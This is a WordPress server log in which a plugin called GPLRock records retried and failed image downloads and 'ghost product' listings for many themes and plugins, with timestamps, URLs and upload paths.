Error: . Retrying... [06-Apr-2026 10:50:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autoglow---car-wash-wordpress-theme-2654.webp for product autoglow-car-wash-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:50:34 UTC] GPLRock: Image download failed for product autoglow-car-wash-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:36 UTC] GPLRock: Image download failed for product autoglow-car-wash-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autoglow---car-wash-wordpress-theme-2654.webp for product autoglow-car-wash-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:50:38 UTC] GPLRock WARNING: Image download failed for product autoglow-car-wash-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autoglow---car-wash-wordpress-theme-2654.webp [06-Apr-2026 10:50:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autoglow-car-wash-wordpress-theme [06-Apr-2026 10:50:38 UTC] GPLRock: Image download failed for product la-comte-fashion-and-clothing-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:40 UTC] GPLRock: Image download failed for product la-comte-fashion-and-clothing-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/la-comte---fashion-and-clothing-store-wordpress-theme-10695.webp for product la-comte-fashion-and-clothing-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:50:43 UTC] GPLRock: Image download failed for product la-comte-fashion-and-clothing-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:45 UTC] GPLRock: Image download failed for product la-comte-fashion-and-clothing-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/la-comte---fashion-and-clothing-store-wordpress-theme-10695.webp for product la-comte-fashion-and-clothing-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:50:47 UTC] GPLRock WARNING: Image download failed for product la-comte-fashion-and-clothing-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/la-comte---fashion-and-clothing-store-wordpress-theme-10695.webp [06-Apr-2026 10:50:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: la-comte-fashion-and-clothing-store-wordpress-theme [06-Apr-2026 10:50:47 UTC] GPLRock: Image download failed for product saratov-day-care-kindergarten-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:49 UTC] GPLRock: Image download failed for product saratov-day-care-kindergarten-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saratov---day-care--kindergarten-school-wordpress-theme-8042.webp for product saratov-day-care-kindergarten-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:50:52 UTC] GPLRock: Image download failed for product saratov-day-care-kindergarten-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:54 UTC] GPLRock: Image download failed for product saratov-day-care-kindergarten-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saratov---day-care--kindergarten-school-wordpress-theme-8042.webp for product saratov-day-care-kindergarten-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:50:56 UTC] GPLRock WARNING: Image download failed for product saratov-day-care-kindergarten-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saratov---day-care--kindergarten-school-wordpress-theme-8042.webp [06-Apr-2026 10:50:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saratov-day-care-kindergarten-school-wordpress-theme [06-Apr-2026 10:50:56 UTC] GPLRock: Image download failed for product govity-municipal-and-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:50:58 UTC] GPLRock: Image download failed for product govity-municipal-and-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/govity---municipal-and-government-wordpress-theme-26544.webp for product govity-municipal-and-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:00 UTC] GPLRock: Image download failed for product govity-municipal-and-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:03 UTC] GPLRock: Image download failed for product govity-municipal-and-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/govity---municipal-and-government-wordpress-theme-26544.webp for product govity-municipal-and-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:05 UTC] GPLRock WARNING: Image download failed for product govity-municipal-and-government-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/govity---municipal-and-government-wordpress-theme-26544.webp [06-Apr-2026 10:51:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: govity-municipal-and-government-wordpress-theme [06-Apr-2026 10:51:05 UTC] GPLRock: Image download failed for product software-service-lunatic-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:07 UTC] GPLRock: Image download failed for product software-service-lunatic-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/software-service-lunatic---app-landing-wordpress-theme-23239.webp for product software-service-lunatic-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:09 UTC] GPLRock: Image download failed for product software-service-lunatic-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:11 UTC] GPLRock: Image download failed for product software-service-lunatic-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/software-service-lunatic---app-landing-wordpress-theme-23239.webp for product software-service-lunatic-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:14 UTC] GPLRock WARNING: Image download failed for product software-service-lunatic-app-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/software-service-lunatic---app-landing-wordpress-theme-23239.webp [06-Apr-2026 10:51:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: software-service-lunatic-app-landing-wordpress-theme [06-Apr-2026 10:51:14 UTC] GPLRock: Image download failed for product flexblog-a-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:16 UTC] GPLRock: Image download failed for product flexblog-a-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexblog---a-personal-wordpress-blog-theme-25902.webp for product flexblog-a-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:18 UTC] GPLRock: Image download failed for product flexblog-a-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:20 UTC] GPLRock: Image download failed for product flexblog-a-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexblog---a-personal-wordpress-blog-theme-25902.webp for product flexblog-a-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:22 UTC] GPLRock WARNING: Image download failed for product flexblog-a-personal-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/flexblog---a-personal-wordpress-blog-theme-25902.webp [06-Apr-2026 10:51:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flexblog-a-personal-wordpress-blog-theme [06-Apr-2026 10:51:22 UTC] GPLRock: Image download failed for product lettuce-organic-food-eco-online-store-products-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:24 UTC] GPLRock: Image download failed for product lettuce-organic-food-eco-online-store-products-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lettuce--organic-food--eco-online-store-products-wordpress-theme-16558.webp for product lettuce-organic-food-eco-online-store-products-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:27 UTC] GPLRock: Image download failed for product lettuce-organic-food-eco-online-store-products-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:29 UTC] GPLRock: Image download failed for product lettuce-organic-food-eco-online-store-products-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lettuce--organic-food--eco-online-store-products-wordpress-theme-16558.webp for product lettuce-organic-food-eco-online-store-products-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:31 UTC] GPLRock WARNING: Image download failed for product lettuce-organic-food-eco-online-store-products-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lettuce--organic-food--eco-online-store-products-wordpress-theme-16558.webp [06-Apr-2026 10:51:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lettuce-organic-food-eco-online-store-products-wordpress-theme [06-Apr-2026 10:51:31 UTC] GPLRock: Image download failed for product dvpn-multipurpose-vpn-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:33 UTC] GPLRock: Image download failed for product dvpn-multipurpose-vpn-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dvpn--multipurpose-vpn-wordpress-theme-28623.webp for product dvpn-multipurpose-vpn-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:35 UTC] GPLRock: Image download failed for product dvpn-multipurpose-vpn-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:37 UTC] GPLRock: Image download failed for product dvpn-multipurpose-vpn-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dvpn--multipurpose-vpn-wordpress-theme-28623.webp for product dvpn-multipurpose-vpn-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:40 UTC] GPLRock WARNING: Image download failed for product dvpn-multipurpose-vpn-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dvpn--multipurpose-vpn-wordpress-theme-28623.webp [06-Apr-2026 10:51:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dvpn-multipurpose-vpn-wordpress-theme [06-Apr-2026 10:51:40 UTC] GPLRock: Image download failed for product artspace-wall-art-print-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:42 UTC] GPLRock: Image download failed for product artspace-wall-art-print-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artspace---wall-art--print-shop-wordpress-theme-4200.webp for product artspace-wall-art-print-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:44 UTC] GPLRock: Image download failed for product artspace-wall-art-print-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:46 UTC] GPLRock: Image download failed for product artspace-wall-art-print-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artspace---wall-art--print-shop-wordpress-theme-4200.webp for product artspace-wall-art-print-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:48 UTC] GPLRock WARNING: Image download failed for product artspace-wall-art-print-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artspace---wall-art--print-shop-wordpress-theme-4200.webp [06-Apr-2026 10:51:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artspace-wall-art-print-shop-wordpress-theme [06-Apr-2026 10:51:48 UTC] GPLRock: Image download failed for product industryall-industrial-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:51 UTC] GPLRock: Image download failed for product industryall-industrial-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industryall---industrial--factory-wordpress-theme-3500.webp for product industryall-industrial-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:53 UTC] GPLRock: Image download failed for product industryall-industrial-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:55 UTC] GPLRock: Image download failed for product industryall-industrial-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 10:51:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industryall---industrial--factory-wordpress-theme-3500.webp for product industryall-industrial-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 10:51:57 UTC] GPLRock WARNING: Image download failed for product industryall-industrial-factory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/industryall---industrial--factory-wordpress-theme-3500.webp [06-Apr-2026 10:51:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: industryall-industrial-factory-wordpress-theme [06-Apr-2026 10:54:07 UTC] GPLRock: Image downloaded successfully for product forgravity-entry-automation-ftp-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89312c5e.jpg [06-Apr-2026 10:54:07 UTC] GPLRock: Using pre-downloaded image for product forgravity-entry-automation-ftp-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89312c5e.jpg [06-Apr-2026 10:54:07 UTC] GPLRock: Ghost product published with image - Product ID: forgravity-entry-automation-ftp-extension [06-Apr-2026 10:54:07 UTC] GPLRock: Image downloaded successfully for product wptouch-pro-mobile-suite-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93f817ae.jpg [06-Apr-2026 10:54:07 UTC] GPLRock: Using pre-downloaded image for product wptouch-pro-mobile-suite-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93f817ae.jpg [06-Apr-2026 10:54:07 UTC] GPLRock: Ghost product published with image - Product ID: wptouch-pro-mobile-suite-for-wordpress [06-Apr-2026 10:54:08 UTC] GPLRock: Image downloaded successfully for product wpfomify-convertkit-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d09123e2.jpg [06-Apr-2026 10:54:08 UTC] GPLRock: Using pre-downloaded image for product wpfomify-convertkit-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d09123e2.jpg [06-Apr-2026 10:54:08 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-convertkit-addon [06-Apr-2026 10:54:09 UTC] GPLRock: Image downloaded successfully for product pennews-multi-purpose-amp-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd87fbf9.jpg [06-Apr-2026 10:54:09 UTC] GPLRock: Using pre-downloaded image for product pennews-multi-purpose-amp-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dd87fbf9.jpg [06-Apr-2026 10:54:09 UTC] GPLRock: Ghost product published with image - Product ID: pennews-multi-purpose-amp-wordpress-theme [06-Apr-2026 10:54:09 UTC] GPLRock: Image downloaded successfully for product apress-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81fdb694.jpg [06-Apr-2026 10:54:09 UTC] GPLRock: Using pre-downloaded image for product apress-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81fdb694.jpg [06-Apr-2026 10:54:09 UTC] GPLRock: Ghost product published with image - Product ID: apress-responsive-multi-purpose-theme [06-Apr-2026 10:54:10 UTC] GPLRock: Image downloaded successfully for product wp-user-frontend-pro-business (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f02b6be.jpg [06-Apr-2026 10:54:10 UTC] GPLRock: Using pre-downloaded image for product wp-user-frontend-pro-business: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3f02b6be.jpg [06-Apr-2026 10:54:10 UTC] GPLRock: Ghost product published with image - Product ID: wp-user-frontend-pro-business [06-Apr-2026 10:54:10 UTC] GPLRock: Image downloaded successfully for product woocommerce-frontend-manager-product-hub (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b2f6e245.jpg [06-Apr-2026 10:54:10 UTC] GPLRock: Using pre-downloaded image for product woocommerce-frontend-manager-product-hub: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b2f6e245.jpg [06-Apr-2026 10:54:10 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-frontend-manager-product-hub [06-Apr-2026 10:54:12 UTC] GPLRock: Image downloaded successfully for product product-catalog-feed-pro-by-pixelyoursite (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7a65cf88.jpg [06-Apr-2026 10:54:12 UTC] GPLRock: Using pre-downloaded image for product product-catalog-feed-pro-by-pixelyoursite: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7a65cf88.jpg [06-Apr-2026 10:54:12 UTC] GPLRock: Ghost product published with image - Product ID: product-catalog-feed-pro-by-pixelyoursite [06-Apr-2026 10:54:12 UTC] GPLRock: Image downloaded successfully for product pxlz-creative-design-agency-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53f55e38.jpg [06-Apr-2026 10:54:12 UTC] GPLRock: Using pre-downloaded image for product pxlz-creative-design-agency-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53f55e38.jpg [06-Apr-2026 10:54:12 UTC] GPLRock: Ghost product published with image - Product ID: pxlz-creative-design-agency-theme [06-Apr-2026 10:54:13 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-maxmind-fraud-prevention-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ef5818f.jpg [06-Apr-2026 10:54:13 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-maxmind-fraud-prevention-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8ef5818f.jpg [06-Apr-2026 10:54:13 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-maxmind-fraud-prevention-addon [06-Apr-2026 10:54:14 UTC] GPLRock: Image downloaded successfully for product social-share-locker-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-04ca121c.jpg [06-Apr-2026 10:54:14 UTC] GPLRock: Using pre-downloaded image for product social-share-locker-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-04ca121c.jpg [06-Apr-2026 10:54:14 UTC] GPLRock: Ghost product published with image - Product ID: social-share-locker-pro-wordpress-plugin [06-Apr-2026 10:54:15 UTC] GPLRock: Image downloaded successfully for product anondho-night-club-event-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e554617b.jpg [06-Apr-2026 10:54:15 UTC] GPLRock: Using pre-downloaded image for product anondho-night-club-event-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e554617b.jpg [06-Apr-2026 10:54:15 UTC] GPLRock: Ghost product published with image - Product ID: anondho-night-club-event-wordpress-theme [06-Apr-2026 10:54:16 UTC] GPLRock: Image downloaded successfully for product jobhunt-job-board-wordpress-theme-for-wp-job-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0257738.jpg [06-Apr-2026 10:54:16 UTC] GPLRock: Using pre-downloaded image for product jobhunt-job-board-wordpress-theme-for-wp-job-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0257738.jpg [06-Apr-2026 10:54:16 UTC] GPLRock: Ghost product published with image - Product ID: jobhunt-job-board-wordpress-theme-for-wp-job-manager [06-Apr-2026 10:54:17 UTC] GPLRock: Image downloaded successfully for product sns-anton-furniture-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb5005db.jpg [06-Apr-2026 10:54:17 UTC] GPLRock: Using pre-downloaded image for product sns-anton-furniture-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb5005db.jpg [06-Apr-2026 10:54:17 UTC] GPLRock: Ghost product published with image - Product ID: sns-anton-furniture-woocommerce-wordpress-theme [06-Apr-2026 10:54:17 UTC] GPLRock: Image downloaded successfully for product gridlove-creative-grid-style-news-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d07cdd1.jpg [06-Apr-2026 10:54:17 UTC] GPLRock: Using pre-downloaded image for product gridlove-creative-grid-style-news-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d07cdd1.jpg [06-Apr-2026 10:54:17 UTC] GPLRock: Ghost product published with image - Product ID: gridlove-creative-grid-style-news-magazine-wordpress-theme [06-Apr-2026 10:54:19 UTC] GPLRock: Image downloaded successfully for product piaf-vue-admin-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-efbf6c41.jpg [06-Apr-2026 10:54:19 UTC] GPLRock: Using pre-downloaded image for product piaf-vue-admin-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-efbf6c41.jpg [06-Apr-2026 10:54:19 UTC] GPLRock: Ghost product published with image - Product ID: piaf-vue-admin-template [06-Apr-2026 10:54:19 UTC] GPLRock: Image downloaded successfully for product travelo-travel-tour-booking-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-999b771d.jpg [06-Apr-2026 10:54:19 UTC] GPLRock: Using pre-downloaded image for product travelo-travel-tour-booking-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-999b771d.jpg [06-Apr-2026 10:54:19 UTC] GPLRock: Ghost product published with image - Product ID: travelo-travel-tour-booking-responsive-wordpress-theme [06-Apr-2026 10:54:20 UTC] GPLRock: Image downloaded successfully for product product-loops-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f8754170.jpg [06-Apr-2026 10:54:20 UTC] GPLRock: Using pre-downloaded image for product product-loops-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f8754170.jpg [06-Apr-2026 10:54:20 UTC] GPLRock: Ghost product published with image - Product ID: product-loops-for-woocommerce [06-Apr-2026 10:54:21 UTC] GPLRock: Image downloaded successfully for product wc-vendors-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7aeb6401.jpg [06-Apr-2026 10:54:21 UTC] GPLRock: Using pre-downloaded image for product wc-vendors-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7aeb6401.jpg [06-Apr-2026 10:54:21 UTC] GPLRock: Ghost product published with image - Product ID: wc-vendors-pro [06-Apr-2026 10:54:24 UTC] GPLRock: Image download failed for product structure-construction-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 10:54:28 UTC] GPLRock: Image download failed for product structure-construction-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 10:54:32 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Structure-Construction-WordPress-Theme.jpg for product structure-construction-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 10:54:34 UTC] GPLRock: Image download failed for product structure-construction-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 10:54:38 UTC] GPLRock: Image download failed for product structure-construction-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 10:54:42 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Structure-Construction-WordPress-Theme.jpg for product structure-construction-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 10:54:42 UTC] GPLRock WARNING: Image download failed for product structure-construction-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/09/Structure-Construction-WordPress-Theme.jpg [06-Apr-2026 10:54:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: structure-construction-wordpress-theme [06-Apr-2026 10:55:57 UTC] GPLRock: Image downloaded successfully for product woocommerce-stamps-com-api (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ce8d24a.jpg [06-Apr-2026 10:55:57 UTC] GPLRock: Using pre-downloaded image for product woocommerce-stamps-com-api: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ce8d24a.jpg [06-Apr-2026 10:55:57 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-stamps-com-api [06-Apr-2026 10:55:58 UTC] GPLRock: Image downloaded successfully for product searchwp-term-highlight (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7191335d.jpg [06-Apr-2026 10:55:58 UTC] GPLRock: Using pre-downloaded image for product searchwp-term-highlight: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7191335d.jpg [06-Apr-2026 10:55:58 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-term-highlight [06-Apr-2026 10:56:00 UTC] GPLRock: Image downloaded successfully for product ultimate-member-private-messages-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b17ae3e.jpg [06-Apr-2026 10:56:00 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-private-messages-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b17ae3e.jpg [06-Apr-2026 10:56:00 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-private-messages-addon [06-Apr-2026 10:56:01 UTC] GPLRock: Image downloaded successfully for product dzs-scroller-gallery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-999632c9.jpg [06-Apr-2026 10:56:01 UTC] GPLRock: Using pre-downloaded image for product dzs-scroller-gallery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-999632c9.jpg [06-Apr-2026 10:56:01 UTC] GPLRock: Ghost product published with image - Product ID: dzs-scroller-gallery [06-Apr-2026 10:56:03 UTC] GPLRock: Image downloaded successfully for product eventon-action-user (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bd238fd.jpg [06-Apr-2026 10:56:03 UTC] GPLRock: Using pre-downloaded image for product eventon-action-user: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bd238fd.jpg [06-Apr-2026 10:56:03 UTC] GPLRock: Ghost product published with image - Product ID: eventon-action-user [06-Apr-2026 10:56:04 UTC] GPLRock: Image downloaded successfully for product popup-maker-forced-interaction (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-174e7513.jpg [06-Apr-2026 10:56:04 UTC] 